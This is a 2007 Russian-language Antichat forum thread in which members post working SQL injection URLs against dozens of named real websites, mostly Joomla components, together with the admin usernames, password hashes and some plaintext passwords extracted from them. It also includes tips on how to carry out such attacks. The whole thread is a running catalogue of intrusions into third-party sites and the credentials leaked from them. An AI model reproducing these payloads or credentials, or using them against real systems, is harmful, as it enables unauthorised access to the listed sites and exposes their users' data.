ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2931  
Старый 24.08.2007, 01:16
Аватар для Nazaret2005
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
По умолчанию

Цитата:
http://ipen.org.in/index.php?option=com_remository&func=selectcat&cat =2529%20union%20select%201,concat(char(117,115,101 ,114,110,97,109,101,58),username,char(32,112,97,11 5,115,119,111,114,100,58),password),0,0,0+from+mos _users/*
username: admin
password - md5: aa874813a18b5048770d683a51b8b342

username: sachin
password - md5: aa874813a18b5048770d683a51b8b342

Цитата:
http://www.lov-wow.com/index.php?option=com_remository&func=selectcat&cat =2529%20union%20select%201,concat(char(117,115,101 ,114,110,97,109,101,58),username,char(32,112,97,11 5,115,119,111,114,100,58),password),0,0,0+from+mos _users/*
username: admin
password - md5: 65f03ae284e333b7d4097d532fdf4045

username: fableman
password - md5: 50432ac5a54b03b3a5c24b2d0de82f84

Цитата:
http://www.p-edge.nl/index.php?option=com_remository&func=selectcat&cat =2529%20union%20select%201,concat(char(117,115,101 ,114,110,97,109,101,58),username,char(32,112,97,11 5,115,119,111,114,100,58),password),0,0,0+from+mos _users/*
username: ADMIN
password - md5: 3820544b8ed2b76f81ba8a234f7c0a6d

Цитата:
http://www.harmarsuperstar.com/index.php?option=com_remository&func=selectcat&cat =2529%20union%20select%201,concat(char(117,115,101 ,114,110,97,109,101,58),username,char(32,112,97,11 5,115,119,111,114,100,58),password),0,0,0+from+mos _users/*
Слишком много юзеров ...

Цитата:
http://corp.nunan.com/index.php?option=com_remository&func=selectcat&cat =2529%20union%20select%201,concat(char(117,115,101 ,114,110,97,109,101,58),username,char(32,112,97,11 5,115,119,111,114,100,58),password),0,0,0+from+mos _users/*
Цитата:
http://www.setrpc.org/index.php?option=com_remository&func=selectcat&cat =2529%20union%20select%201,concat(char(117,115,%20 101,114,110,97,109,101,58),username,char(32,112,97 %20,115,115,119,111,114,100,58),password),0,0,0+fr om+%20mos_users/*
username: setrpc
password: planning

Цитата:
http://www.firstpresbyterian.org/index.php?option=com_remository&func=selectcat&cat =2529%20union%20select%201,concat(char(117,115,%20 101,114,110,97,109,101,58),username,char(32,112,97 %20,115,115,119,111,114,100,58),password),0,0,0+fr om+%20mos_users/*
username: volunteer1
password: iamone

Цитата:
http://www.contractors.net/index.php?option=com_remository&func=selectcat&cat =2529%20union%20select%201,concat(char(117,115,%20 101,114,110,97,109,101,58),username,char(32,112,97 %20,115,115,119,111,114,100,58),password),0,0,0+fr om+%20mos_users/*
username: gail
password: miser

Слишком много юзеров ...

Последний раз редактировалось Nazaret2005; 24.08.2007 в 01:45..
 
Ответить с цитированием

.edu
  #2932  
Старый 24.08.2007, 01:29
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию .edu

www.hec.edu

Код:
http://www.hec.edu/hec/eng/professeurs_recherche/p_liste/p_bio.php?num=-92+union+select+1,2,3,4,convert(concat(version(),0x3a,user(),0x3a,database()),binary),6,7/*
version: 4.1.11-Debian_4-log
user: hec_profs@localhost
db: hec_profs_recherche

www.law.gmu.edu

Код:
http://www.law.gmu.edu/academics/course_detail.php?num=-177+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10/*
version: 4.0.13-log
user: lawSelect@localhost
db: Courses

Последний раз редактировалось [53x]Shadow; 24.08.2007 в 01:46..
 
Ответить с цитированием

  #2933  
Старый 24.08.2007, 02:02
Аватар для Nazaret2005
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
По умолчанию

Цитата:
http://chany.1nsk.ru/component/index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(
char(117,115,101,114,110,97,109,101,58),username,c har(32,112,
97,115,115,119,111,114,100,58),password),4,5,6,7,8 ,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%2 0jos_users/*
username: admin
password - md5: 482d8830c76ce67c975ab46ff3ba5d06

Цитата:
http://www.wickedminds.net/index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char
(117,115,101,114,110,97,109,101,58),username,char( 32,112,97,115,115,119,111,114,100,58),password),4, 5,6,7,8,9,00,0,444,555,0,777,0,999,
0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: 529b0ab29f005d89132fa6ce4df3b0dd

Цитата:
http://www.blueprinteducation.org/west/index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,
0,concat(char(117,115,101,114,110,97,109,101,58),u sername,char(32,112,97,115,115,119,111,114,100,58) ,password),4,5,6,7,8,9,00,0,444,555,
0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: ca7962a267407927e34b1aeed06a3cb0

Цитата:
http://www.this-is-a-remix.com/Joomla/index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,
concat(char(117,115,101,114,110,97,109,101,58),use rname,char(32,112,97,115,115,119,111,114,100,58),p assword),4,5,6,7,8,9,00,0,444,555,
0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*
username: jtwist
password - md5: 14969f34049e464f88d02bd075cdcf2c

Цитата:
http://www.jesushouse.at/joomla/index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,conc
at(char(117,115,101,114,110,97,109,101,58),usernam e,char(32,112,97,115,115,119,111,114,100,58),passw ord),4,5,6,7,8,9,00,0,444,555,0,777,
0,999,0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: 0c493157cc274bb698dada25a92b06a6

Цитата:
http://www.ostprignitz-jugend.de/gewoelbe/component/index.php?option=com_eventlist&func=details&did=99 99999999999%20union
%20select%200,0,concat(char(117,115,101,114,110,97 ,109,101,58),username,char(32,112,97,115,115,119,1 11,114,100,58),password),4,5,6,
7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
username: admin
password - md5: bdcb268b0facd7d6b24c0d39091be524

Цитата:
http://sjonniewiener.biz/cms/index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(
char(117,115,101,114,110,97,109,101,58),username,c har(32,112,97,115,115,119,111,114,100,58),password ),4,5,6,7,8,9,00,0,444,555,0,777,
0,999,0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: 8ce83701c7e38f2e96f7f6bb2825b0b4

Цитата:
http://www.kabardin.sk/index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(
117,115,101,114,110,97,109,101,58),username,char(3 2,112,97,115,115,119,111,114,100,58),password),4,5 ,6,7,8,9,00,0,444,555,0,777,0,999
,0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: ded7d59e7ae3d9d77a6726f1f5dc8771

Цитата:
http://www.euro-kink.com/cms/index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,
concat(char(117,115,101,114,110,97,109,101,58),use rname,char(32,112,97,115,115,119,111,114,100,58),p assword),4,5,6,7,8,9,00,0,444
,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: 69c3dab74972313bb8ad3ec437014aa0

Последний раз редактировалось _Great_; 26.08.2007 в 11:31.. Причина: задолбало за тобой править..
 
Ответить с цитированием

  #2934  
Старый 24.08.2007, 03:05
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Код:
http://property.offshore-manual.ru/index.php?option=com_gmaps&task=viewmap&Itemid=86&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:aaa86f62472c97f82be7a20373c5faf5

Код:
http://www.popiteru.ru/index.php?option=com_gmaps&task=viewmap&Itemid=8&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
fredi:cdfba41d8d0f3f466bcdac7562153620

Код:
http://golf.gr/index.php?option=com_gmaps&task=viewmap&Itemid=1&mapId=-1/**/union/**/select/**/0,password,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:7946848d74345f8b1601419267bc46a0:sgGX9fKiTQK Uc24D

Код:
http://www.ttclubs.com/index.php?option=com_gmaps&task=viewmap&Itemid=3&mapId=-1/**/union/**/select/**/0,password,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:50deaf76906c4b018bb8671621976014

Код:
http://turnersimscouk.pre-dns-change.com/index.php?option=com_gmaps&task=viewmap&Itemid=54&mapId=-1/**/union/**/select/**/0,1,username,3,4,5,6,7,8/**/from/**/jos_users/*
admin:b6ba6f629e24ada12521da3313385d21

Код:
http://www.srkengineering.com.au/index.php?option=com_gmaps&task=viewmap&Itemid=21&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:4a50a931db0de18a8e299cea8c462277

Код:
http://www.dpsnc.net/Guatemala/index.php?option=com_gmaps&task=viewmap&Itemid=27&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:11c1066dde013e2cd20932d053ef895c

Код:
http://www.melplashshow.co.uk/?option=com_gmaps&task=viewmap&Itemid=38&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:f5091ef24d4d9f56b36750957b6fa616

Код:
http://www.aysoareag.org/index.php?option=com_gmaps&task=viewmap&Itemid=69&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:fcf337650b59ce188612847cbc0f885c:AwyDiAKPawh AsgF8

Код:
http://www.shipcreeksalmonderby.com/index.php?option=com_gmaps&task=viewmap&Itemid=28&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
cadguy:bde1cf25419a99580b47bb0f23268d25

Код:
http://tucepi-apartments.com/index.php?option=com_gmaps&task=viewmap&Itemid=42&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:48a53d5b1db6d3d13f6749e05cba00ae

Код:
http://www.exmouthonline.com/index.php?option=com_gmaps&task=viewmap&Itemid=67&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:f75fa350c0b642b05ce2b22223760c71

Код:
http://lcsa.info/index.php?option=com_gmaps&task=viewmap&Itemid=49&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
TenX:8f6add1ee934dacc262e369a8403d08e

Код:
http://www.mightycity.co.uk/index.php?option=com_gmaps&task=viewmap&Itemid=5&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:b6450e32a9efc7f172d49a57fd570fbd

Код:
http://www.jemburtigny.ch/index.php?option=com_gmaps&task=viewmap&Itemid=99&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:1a1dc91c907325c69271ddf0c944bc72

Код:
http://www.global-resources.co.uk/content/index.php?option=com_gmaps&task=viewmap&Itemid=46&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
1a1n5adm1nAcc0unt:63c59ca1a431d10c2f3687216350d6a7

Код:
http://www.sportzone.org.nz/index.php?option=com_gmaps&task=viewmap&Itemid=374&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:7235d5430129327c4bb96062bb5ce6bd

Код:
http://www.cateandsally.com/index.php?option=com_gmaps&task=viewmap&Itemid=35&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:b266d4f01cb077a11dd62e46302d27de

Код:
http://www.yumyummap.com/san_francisco/index.php?option=com_gmaps&task=viewmap&Itemid=17&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
colin.pantin:bc6f70c347db763a83b4b4be0ac1f222:epi5 1i3ITlVLHFwk

Код:
http://www.bwtc.com/index.php?option=com_gmaps&task=viewmap&Itemid=27&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:694f33456eab7e8665bca258a6aca942

Код:
http://www.digestcommunity.net/index.php?option=com_gmaps&task=viewmap&Itemid=76&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
digestedadmin:fc2d1e75174ff5d93d8aa7dba4b53590

Код:
http://stjamesepiscopal.info/index.php?option=com_gmaps&task=viewmap&Itemid=42&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
hbaker:23245cbfa834b21e1208b7b7c0cbb130

Код:
http://lisbon.directrouter.com/~crystalf/index.php?option=com_gmaps&task=viewmap&Itemid=36&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
Shaun Anderson:6e9c4948c7f04aeb5556575fd2d56487

Код:
http://www.ifactory.com.au/index.php?option=com_gmaps&task=viewmap&Itemid=93&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:863c0c12916237790b8b9f5b719bad2b

Код:
http://sierraapplefestival.com/index.php?option=com_gmaps&task=viewmap&Itemid=27&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:9b2e1b7883b38f7b6ed478ebc26b3655

Код:
http://www.islengineering.com/index.php?option=com_gmaps&task=viewmap&Itemid=104&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
islengin:033f123b9e92e3d5dcef9b84bebd2189

Код:
http://www.texanstalk.com/index.php?option=com_gmaps&task=viewmap&Itemid=3&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:a9ff7154aea384f303e20aef3a1c187e

Код:
http://avonpd.com/index.php?option=com_gmaps&task=viewmap&Itemid=35&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
avonpdco:d46cb1ca6bd45a378db30d1a680e27bb

Код:
http://www.intemo.com/index.php?option=com_gmaps&task=viewmap&Itemid=32&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:48c50c33e87aaec5dee39606f60bf8dayvCnXD0hUz EUXNR

Код:
http://northwalesclimbers.co.uk/index.php?option=com_gmaps&task=viewmap&Itemid=80&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:9224860eb0eeea71e76f7471d11d2aed

Код:
http://www.kitemed.com/2/index.php?option=com_gmaps&task=viewmap&Itemid=82&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*&Itemid=81
admin:4b16650d001fd94c0e8e9162bca51447

Код:
http://www.worleylaw.com/index.php?option=com_gmaps&task=viewmap&Itemid=118&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
Nickolai:f43332752bcd5e7e72d799fa176e065b
 
Ответить с цитированием

  #2935  
Старый 24.08.2007, 09:06
Аватар для fobofob
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Информация о колонках и таблицах не выводится,или я ошибаюсь?


Код:


http://www.flirtanica.ru/articles1.php?id=-89+UNION+SELECT+1,CONCAT(VERSION(),0x3a,USER(),0x3 a,DATABASE()),3,4,5/*



выдает ошибку: error:1044 Access denied for user 'flirtani'@'%' to database 'INFORMATION_SCHEMA'
 
Ответить с цитированием

  #2936  
Старый 24.08.2007, 09:16
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от fobofob  
Информация о колонках и таблицах не выводится,или я ошибаюсь?


Код:


http://www.flirtanica.ru/articles1.php?id=-89+UNION+SELECT+1,CONCAT(VERSION(),0x3a,USER(),0x3 a,DATABASE()),3,4,5/*



выдает ошибку: error:1044 Access denied for user 'flirtani'@'%' to database 'INFORMATION_SCHEMA'
1) Юзай антибоян: http://antiboyansql.narod.ru/sql.txt

2) Версия мускула здесь 4, а значит что тут нету таблиц information_schema.tables и information_schema_columns

Очень тебе советую почитать побольше статей и мануалов.

3) На будующее эта тема не для вопросов, флейм, не раскрученные скули и т.д. будут удаляться.

Последний раз редактировалось Grey; 24.08.2007 в 09:19..
 
Ответить с цитированием

  #2937  
Старый 24.08.2007, 23:39
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.bluebit.com.au/cms.php?id=-6+union+select+1,VERSION(),3/*
 
Ответить с цитированием

  #2938  
Старый 24.08.2007, 23:57
Аватар для x.Elf
x.Elf
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515

Репутация: 29
Отправить сообщение для x.Elf с помощью ICQ
По умолчанию

http://znakomstva.nu/metro.php?st=-1+union+select+1,concat(login,0x26,password),3+fro m+members/*
admin - 13061973
все пароли в открытом виде
да еще и мускул 5)
вам какой секс? классика? мадомаза? )) - на сайт зайдете - поймете меня )
 
Ответить с цитированием

  #2939  
Старый 25.08.2007, 00:19
Аватар для x.Elf
x.Elf
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515

Репутация: 29
Отправить сообщение для x.Elf с помощью ICQ
По умолчанию

http://www.zdv.ru/include/gallery.php?item=-1+union+select+1,2,3,4,5,6,7,name,9,10,11,12,13,14 ,15,16,17,18,version(),password,21+from+users+limi t+4,2/*
журнал какойто - типа эротический...непомню)
мускул 4 - и пара траблов
Таблицу юзерс нашел - в ней есть колумн пассворд а какой колумн логин держит не нашел))
+ ни один хеш расколоть не смог...
 
Ответить с цитированием

  #2940  
Старый 25.08.2007, 00:55
Аватар для x.Elf
x.Elf
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515

Репутация: 29
Отправить сообщение для x.Elf с помощью ICQ
По умолчанию

Цитата:
Сообщение от Hormold  
http://www.softp.ru/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+members/*

Несмог подобрать...
ыгы ыгы...Тыбы статьи почитал а?
http://www.softp.ru/?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17/*
Во первых - с чего ты взял что полей 10 во вторых с чего ты взял что там есть таблица мемберс?Или тебя плющит потому что ночь?Ты может выпил?
СТАТЬИ ЧИТАААААТЬ (юзай поиск и найдешь их на а-чате)
там еще бд мускул 4 - так что геморой с таблицами оставил тебе....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ